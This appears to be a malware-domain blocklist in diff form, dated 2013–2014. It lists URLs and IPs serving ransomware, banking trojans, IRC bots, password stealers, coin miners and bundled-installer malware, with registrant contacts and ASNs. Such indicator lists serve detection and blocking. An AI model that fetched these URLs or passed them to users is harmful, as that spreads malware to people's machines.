+"2013/12/09_09:45","europol.europe.eu.france.id647744160-2176514326.h5841.com/?flow_id=8615&511004=52895/case_id=27223","193.169.87.247","-","Ransomware","Registrar Abuse Contact abuse@bizcn.com","48031","0","UA", +"2013/12/09_09:45","z7752.com/checkout.php?step=1","195.191.56.113","-","Ransomware payment processor","Registrar Abuse Contact abuse@bizcn.com","50395","0","UA", +"2013/12/09_09:52","mobatory.com/8jxjj7ifv3055xytz5ih3o130iar6rf9","78.140.142.186","-","Leads to ransomware","Registrar Abuse Contact abuse@publicdomainregistry.com","35415","0","NL", +"2013/12/09_09:52","trahic.ru/5ebydvkrgw04am7wjly","78.140.142.178","-","Leads to ransomware","-","35415","0","NL", +"2013/12/09_09:52","trahic.ru/6h3m0gs9sgb81g8h0hdefhh9a?zhkk4a8gv=1","78.140.142.178","-","Leads to ransomware","-","35415","0","NL", +"2013/12/09_09:52","trahic.ru/5mm3i7t83m2t8dlja","78.140.142.178","-","Leads to ransomware","-","35415","0","NL", +"2013/12/09_09:52","trahic.ru/6h3m0gs9sgb8vxr70voqj1fa6?","78.140.142.186","-","Leads to ransomware","-","35415","0","NL", +"2013/12/09_10:17","mobatory.com/5bj0eswiecc78rvp3egufo5xossn1segz4653xhs4?37o78=46se8http%2F%3F%3Ftrahic.ru%3F6h3m0gs9sgb8vxr70voqj1fa6?&j68ljm=&6b42bbis=t85660263&pqsubf2hr=1","78.140.142.178","-","Leads to ransomware","Registrar Abuse Contact abuse@publicdomainregistry.com","35415","0","NL", +"2013/12/09_10:22","vroll.net","78.140.142.165","-","Leads to ransomware","Registrar Abuse Contact abuse@publicdomainregistry.com","35415","0","NL", +"2013/12/09_10:22","mobatory.com/70i1sxn6q8s86lqb6tfkgdehq","78.140.142.178","-","Leads to ransomware","Registrar Abuse Contact abuse@publicdomainregistry.com","35415","0","NL", +"2013/12/09_10:57","mobatory.com/7jwgzo2ub186py0imhspqlfoe","78.140.142.178","-","Leads to ransomware","Registrar Abuse Contact abuse@publicdomainregistry.com","35415","0","NL", +"2013/12/09_10:57","mobatory.com/5uxfljc5z4s6eacz305ic45h25hq3srib5tc1b51g?j8c=49ljg&pjz9ci=rapid8.com/&3kgiokr8=t3619158&80ipnpaegcqj19=rapid8.com/stage2.php&4kf7k=0&31n33=0&3ea6o=0&3cvlt=0&wr71g34ni=1&127ehq780r=0&6s89o644imz=0&78ob3sh84zkh1z=1&6iu2mhp1=0&rpo5za53h=1024&yq84eazbm=768&8v0luzzkqq3=0&6s5iunzsdhm2mj30=1","78.140.142.178","-","Leads to ransomware","Registrar Abuse Contact abuse@publicdomainregistry.com","35415","0","NL", +"2013/12/09_10:57","mobatory.com/5uxfljc5z4s6eacz305ic45h25hq3srib5tc1b51g?j8c=49ljg&pjz9ci=rapid8.com/&3kgiokr8=t3619158&80ipnpaegcqj19=rapid8.com/stage2.php&4kf7k=0&31n33=0&3ea6o=0&3cvlt=0&wr71g34ni=1&127ehq780r=0&6s89o644imz=0&78ob3sh84zkh1z=1&6iu2mhp1=0&rpo5za53h=1024&yq84eazbm=768&8v0luzzkqq3=0&7uyedgxpbuv6y8kxg34cuxdmz=99780&98uca7ro8qv6eu5qpnguteh6r=","78.140.142.186","-","Leads to ransomware","Registrar Abuse Contact abuse@publicdomainregistry.com","35415","0","NL", +"2013/12/09_11:11","amu.brandnewinstall.info/yaelmendel/gadget/","162.210.192.9","-","Leads to Win32/InstallRex","BRANDNEWINSTALL.INFO@domainsbyproxy.com","30633","0","US", +"2013/12/09_11:11","amu.helpyourselfinstall.info/iframe/?d=1271","162.210.192.5","-","Leads to Win32/InstallRex","HELPYOURSELFINSTALL.INFO@domainsbyproxy.com","30633","0","US", +"2013/12/09_11:11","amu.twobox4addon.info/rachel/","162.210.192.5","-","Leads to Win32/InstallRex","TWOBOX4ADDON.INFO@domainsbyproxy.com","30633","0","US", +"2013/12/09_11:11","amu.helpyourselfinstall.info/iframe/?d=1118","162.210.192.5","-","Leads to Win32/InstallRex","HELPYOURSELFINSTALL.INFO@domainsbyproxy.com","30633","0","US", +"2013/12/09_11:19","amu.adduraddonhere.info/lpgreenseal/","141.101.117.61","-","Leads to Win32/InstallRex","ADDURADDONHERE.INFO@domainsbyproxy.com","13335","0","EU", +"2013/12/09_11:19","amu.boxinstallercompany.info/iframe/?d=746","162.210.192.9","-","Leads to Win32/InstallRex","BOXINSTALLERCOMPANY.INFO@domainsbyproxy.com","30633","0","US", +"2013/12/12_10:10","-","31.220.3.68/www/","dedicated.koddos.com.","Java drive-by","-","199636","0","DE", +"2013/12/12_10:10","-","31.220.3.68/www/BotLoader.exe","dedicated.koddos.com.","Trojan.Atrax","-","199636","0","DE", +"2013/12/12_10:24","-","31.220.3.68/www/BotLoader.exe","dedicated.koddos.com.","Trojan.Atrax","-","199636","0","DE", +"2013/12/12_10:24","-","31.220.3.68/www/402022Rechnung.PDF.exe","dedicated.koddos.com.","Trojan","-","199636","0","DE", +"2013/12/12_10:24","-","31.220.3.68/www/StealerDllx86.dll_raw","dedicated.koddos.com.","Trojan.PWS","-","199636","0","DE", +"2013/12/19_16:43","directxex.com/uploads/1201296916.8h.exe","108.162.198.96","-","Backdoor.Bot","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/1251104917.p9g.exe","108.162.199.96","-","Trojan.Zbot.CXgen","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/1353613345.ih.exe","108.162.199.96","-","Trojan.IRCbot","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/143265795.ohi.exe","108.162.199.96","-","Trojan.Ircbot.SI","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/1565397800.9g.exe","108.162.199.96","-","Trojan.Zbot.CXgen","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/158511922.uf.exe","108.162.198.96","-","Trojan.IRCbot","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/1607796965.id100.exe","108.162.198.96","-","Trojan.Agent","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/1836606807.9g.exe","108.162.198.96","-","Trojan.FakeMIRC","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/1853928844.97g.exe","108.162.198.96","-","Trojan.Zbot.CXgen","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/1991519040.aeg.exe","108.162.199.96","-","Trojan.Ircbot.SI","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/223478294.insid-start-sjw.exe","108.162.199.96","-","Trojan.Agent.MNR","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/232683212.igi.exe","108.162.199.96","-","Trojan.Agent.DE","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/31401351.final5.exe","108.162.199.96","-","Trojan.Agent.AI","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/384011806.gotter.exe","108.162.199.96","-","Trojan.LVBP","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/414294618.009.exe","108.162.199.96","-","Trojan.Inject","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/609015994.mining.exe","108.162.199.96","-","Backdoor.MSIL.P","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/620509324.MINIMON.exe","108.162.199.96","-","Trojan.MSIL","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/623307317.inst.exe","108.162.198.96","-","Trojan.Agent","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/636954784.ok.exe","108.162.198.96","-","Trojan.Agent.DEED","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/662268336.BIN.exe","108.162.198.96","-","Trojan.Napolar","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/687255529.delfi.exe","108.162.198.96","-","Trojan.Inject","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/744646896.rbsrb.exe","108.162.198.96","-","Trojan.Zbot.CXgen","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/777724411.safetyCheck.exe","108.162.198.96","-","Trojan.Agent.AI","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/818611823.insidrazor.exe","108.162.198.96","-","Trojan.Autoit","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/836587333.skp.exe","108.162.198.96","-","Trojan.Ircbot.SI","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/845426478.xa.exe","108.162.199.96","-","Trojan.FakeMIRC","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/90200102.neusteBotLoader.exe","108.162.199.96","-","Backdoor.Bot.Tor","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/995578741.miner.exe","108.162.199.96","-","Trojan.MSIL","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/1744698061.miner.txt","108.162.199.96","-","Trojan.MSIL","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/281742754.abbba.exe","108.162.199.96","-","Win32/Injector.ATSD trojan","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/566077266.ms.exe","108.162.199.96","-","Win32/Injector.Autoit.VH trojan","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/1347878398.miner2.exe","108.162.199.96","-","MSIL/CoinMiner.CV trojan","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/1565998043.test.exe","108.162.199.96","-","Trojan..HKWQREW","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/2111586998.onoj.exe","108.162.198.96","-","Win32/Injector.ATFB trojan","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/19_16:43","directxex.com/uploads/566077266.ms.exe?dl=1","108.162.198.96","-","Win32/Injector.Autoit.VH trojan","Admin 6DD11E2401374873B6134E52ECB04438.PROTECT@WHOISGUARD.COM","13335","0","US", +"2013/12/20_15:23","down2.feiyang163.com/soft/wavtomp3.exe","211.101.12.49","-","Trojan.Android","-","4808","0","CN", +"2013/12/20_15:23","down3.feiyang163.com/soft/fcssq.exe","211.101.12.49","-","Trojan.Android","-","4808","0","CN", +"2013/12/20_15:23","d1.kuai8.com/setup/kuai8_zjy.exe","61.158.145.141","141.145.158.61.ha.cnc.","Trojan.Backdoor","-","4837","0","CN", +"2013/12/20_15:23","down.unadnet.com.cn/soft/2Dmofang.exe","211.101.12.49","-","Trojan.Chad","Registrant Contact microsword@sohu.com / Registrant Contact microsword@sohu.com","4808","0","CN", +"2013/12/20_15:23","down.unadnet.com.cn/soft/loveletter.exe","211.101.12.49","-","Trojan.Chad","Registrant Contact microsword@sohu.com / Registrant Contact microsword@sohu.com","4808","0","CN", +"2013/12/20_15:23","ddd.gouwuke.cn/down/exejmman.exe","211.101.12.49","-","Trojan.Delf","Registrant Contact cnlindehua@sohu.com / Registrant Contact cnlindehua@sohu.com","4808","0","CN", +"2013/12/20_15:23","-","211.101.12.49/dls/axuip.exe","-","Trojan.Downloader","-","4808","0","CN", +"2013/12/20_15:23","-","211.101.12.49/dls/axujp.exe","-","Trojan.Downloader","-","4808","0","CN", +"2013/12/20_15:23","down.feiyang163.com/soft/alexacha.exe","211.101.12.49","-","Trojan.Downloader","-","4808","0","CN", +"2013/12/20_15:23","down.feiyang163.com/soft/usblock.exe","211.101.12.49","-","Trojan.Downloader","-","4808","0","CN", +"2013/12/20_15:23","down.feiyang163.com/soft/wbjfsys.exe","211.101.12.49","-","Trojan.Downloader","-","4808","0","CN", +"2013/12/20_15:23","down.guangsu.cn/qdn/setup_qd262.exe","121.63.179.184","-","Trojan.Dropper","Registrant Contact lovermy@qq.com / Registrant Contact lovermy@qq.com","4134","0","CN", +"2013/12/20_15:23","down.guangsu.cn/qdn/setup_qd304.exe","122.225.106.101","-","Trojan.Dropper","Registrant Contact lovermy@qq.com / Registrant Contact lovermy@qq.com","4134","0","CN", +"2013/12/20_15:23","www.sj88.com/hezi/jm/s1000.exe","202.97.174.68","-","Trojan.Dropper","Registrant NAMENIC@GMAIL.COM","4837","0","CN", +"2013/12/20_15:23","k.h.a.d.free.fr/pub/utils/oepv.exe","212.27.63.102","perso102-g5.free.fr.","Trojan.Emogen.U","hostmaster@proxad.net","12322","0","FR", +"2013/12/20_15:23","-","211.101.12.49/dls/axujo.exe","-","Trojan.SelfDel","-","4808","0","CN", +"2013/12/20_15:23","download.grandcloud.cn/9291/15474/setup_2949-14598.exe","211.147.13.224","-","Trojan.Symmi","Registrant Contact liuzuyong@snda.com / Registrant Contact liuzuyong@snda.com","17431","0","CN", +"2013/12/20_15:23","download.grandcloud.cn/9291/16411/80347_al.exe","58.215.169.42","-","Trojan.Symmi","Registrant Contact liuzuyong@snda.com / Registrant Contact liuzuyong@snda.com","4134","0","CN", +"2013/12/20_15:23","download.grandcloud.cn/9291/17147/cool_ES_PC35152730.exe","58.215.169.42","-","Trojan.Symmi","Registrant Contact liuzuyong@snda.com / Registrant Contact liuzuyong@snda.com","4134","0","CN", +"2013/12/20_15:23","www.feiyang163.com/soft/fySpeaker.exe","211.101.12.49","-","Win32/Trojan.Backdoor","-","4808","0","CN", +"2013/12/20_15:23","thefxarchive.com/Downloads/WLMM/MMK_Warp_Variations.exe","98.131.172.1","rev.opentransfer.com.1.172.131.98.in-addr.arpa.","Win32/Trojan.Genome","Registrant MIKESTVTIPS@YAHOO.COM","32392","0","US", +"2013/12/20_15:23","formessengers.com/download.php?PN=MLP","72.167.131.157","p3slh193.shr.phx3.secureserver.net.","Win32/Trojan.Injects","-","26496","0","US", +"2013/12/20_15:23","dl.microsword.net/softdown/filerubber.exe","211.101.12.49","-","Win32/Trojan.Pasta.h","-","4808","0","CN", +"2013/12/20_15:23","dl.microsword.net/Softdown/VideoRecord.exe","211.101.12.49","-","Win32/Trojan.Pasta.h","-","4808","0","CN", +"2013/12/20_15:23","download.56.com/lp/client/update.lua","59.32.213.195","195.213.32.59.broad.sg.gd.dynamic.163data.com.cn.","Win32/Trojan.Spy","-","4134","0","CN", +"2013/12/20_15:23","download.56.com/lp/client/woxiu1.0.15_20119070.exe","59.32.213.195","195.213.32.59.broad.sg.gd.dynamic.163data.com.cn.","Win32/Trojan.Spy","-","4134","0","CN", +"2013/12/20_15:23","download.ttrili.com:98/Setup%5B57%5D-rl.exe","223.244.255.16","-","Win32/Trojan.Spy","chaofan lin 75146226@qq.com","4134","0","CN", +"2013/12/20_15:23","download.ttrili.com:98/Setup%5B75%5D-rl.exe","117.28.254.156","-","Win32/Trojan.Spy","chaofan lin 75146226@qq.com","4134","0","CN", +"2013/12/20_15:23","download.ttrili.com:98/setup%5B79%5D-rl.exe","117.28.254.156","-","Win32/Trojan.Spy","chaofan lin 75146226@qq.com","4134","0","CN", +"2013/12/20_15:23","download.ttrili.com:98/Setup[11]-rl.exe","117.28.254.156","-","Win32/Trojan.Spy","chaofan lin 75146226@qq.com","4134","0","CN", +"2013/12/20_15:23","f.gj555.net/download/setups30035.exe","118.26.178.5","-","Win32/Trojan.Spy","cao jiajia / 58604788@qq.com","4808","0","CN", +"2013/12/20_15:23","f.gj555.net/download/setups30138.exe","118.26.178.5","-","Win32/Trojan.Spy","cao jiajia / 58604788@qq.com","4808","0","CN", +"2013/12/20_15:23","f.gj555.net/download/setups34338.exe","118.26.178.5","-","Win32/Trojan.Spy","cao jiajia / 58604788@qq.com","4808","0","CN", +"2013/12/20_15:23","f.gj555.net/download/setups75613.exe","118.26.178.5","-","Win32/Trojan.Spy","cao jiajia / 58604788@qq.com","4808","0","CN", +"2013/12/20_15:23","f.gj555.net/download/setups83563.exe","118.26.178.5","-","Win32/Trojan.Spy","cao jiajia / 58604788@qq.com","4808","0","CN", +"2013/12/20_15:23","f.gj555.net/download/setups91646.exe","118.26.178.5","-","Win32/Trojan.Spy","cao jiajia / 58604788@qq.com","4808","0","CN", +"2013/12/20_15:23","f.gj555.net/download/setups95191.exe","118.26.178.5","-","Win32/Trojan.Spy","cao jiajia / 58604788@qq.com","4808","0","CN", +"2013/12/20_15:23","files.dsnetwb.com/aTube_Catcher_5188_ATU3.exe","174.37.194.151","sky.dsnetwb.com.","Win32/Trojan.Spy","-","36351","0","US", +"2013/12/20_15:23","www.zctei.com/date/9377chiyue_Y_Cdcr1124.exe","122.225.107.85","-","Win32/Trojan.Spy","ythappyboy@163.com","4134","0","CN", +"2014/03/11_22:39","somethingnice.hc0.me/Miner/Ufasoft.files","5.135.127.68","-","Trojan.PlasmaRAT","WhoisGuard Protected / 630ca54ebc794d67bd94109ac2190e52.protect@whoisguard.com","16276","0","FR", +"2014/02/07_09:44","www.t-gas.co.uk/1.txt","212.227.26.21","-","Leads to exploit at jolygoestobeinvester.ru","Gordon Potts / -","8560","0","DE", +"2014/02/07_08:25","www.zatzy.com/allmaent/391854-volvos-nya-drive-e.html","81.201.217.115","-","compromised site leads to exploit kit","Registrar Abuse Contact abuse@ascio.com","41175","0","SE", +"2013/12/29_17:53","aippnetworks.com/plugins/authentication/joomla/aviancataca/aviancatacafreeticket.php","195.74.65.196","195-74-65-196.ip.aleto.nl.","Redirects to Trojan","Registrant sloopymikegyamfi@gmail.com","25459","0","NL", +"2014/01/06_12:28","dl.downf468.com/n/3.0.25/2629037/manual-de-configuración-del-putty.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.2/11975718/ultrasurf+13.03.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.25/11999301/Silver+TV+3.0.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.25/7412352/BTV+Solo.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26/11433792/Automation+Studio+6.0.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26/11649331/Super+Mario+Sunshine+64+1.0.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26/12050993/Free+RAR+Extract+Frog.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.24.1/12015256/Windows+Product+Key+Code+Finder+2.20.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.24.1/12015430/NT+Key+Enterprise+Edition+3.80.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.25/12023961/Microsoft+Hesap+Makinesi++.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.25/4789416/LogiEscalierExpert.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.1/11630753/iniciación-a-la-soldadura-con-estaño.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.1/11812852/n5239.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.1/11358561/notepad+++.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.1/11707102/psx0139.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.1/11707353/psx0046.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/1033/poweriso.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/11431055/dragon+naturally+speaking+9.0.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/11431361/who+anthro+3.2.2.1.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/2269383/roadnav.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/2836178/gambas+a+la+egipcia.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/5345299/vietkey.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/5349388/adfender.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/5366358/mediaget.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/5366255/flv_media_player.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/5830397/matlab.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/6445693/calibre.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/6773557/odin3.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26/11433792/AutomationStudio6.0.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26/11649331/SuperMarioSunshine641.0.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26/12050993/FreeRARExtractFrog.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.25/7412352/BTVSolo.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.24.1/4790826/Handball+Challenge.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/4812448/pointage+d%E2%80%99heures.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/5347935/wondershare+pdf+to+word.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.25/11999301/SilverTV3.0.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.24.1/12015256/WindowsProductKeyCodeFinder2.20.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.24.1/12015430/NTKeyEnterpriseEdition3.80.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.2/5331438/FLV_Media_Player.exe=0D=0Ahttp:/grandinstalls.ru/RlpaXhQBAUhBXE1LXQBMW1cDSEdCSwBcWwFJS1pxVkNCEUhHQktxR0oT/torrent/147458862/498349280/torrent.exe=","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.2/12014376/Setup.exe=0D=0Ahttp:/dl.softpzivrubajjui.net/n/3.0.26.2/5565169/FLVMPlayer.exe=","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.2/5738856/FLV_Media_Player.exe=0D=0Ahttp:/dl.softpzivrubajjui.net/n/3.0.26.2/10064255/HitmanPro.exe=","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.2/5738856/FLV_Media_Player.exe=0D=0Ahttp:/dl.softpzivrubajjui.net/n/3.0.26.2/11799286/Opera.exe=","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.2/5785797/FLV_Media_Player.exe=0D=0Ahttp:/dl.softohqimjjedf0jq.net/n/3.0.26.2/5784498/FLV_Media_Player.exe=","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", 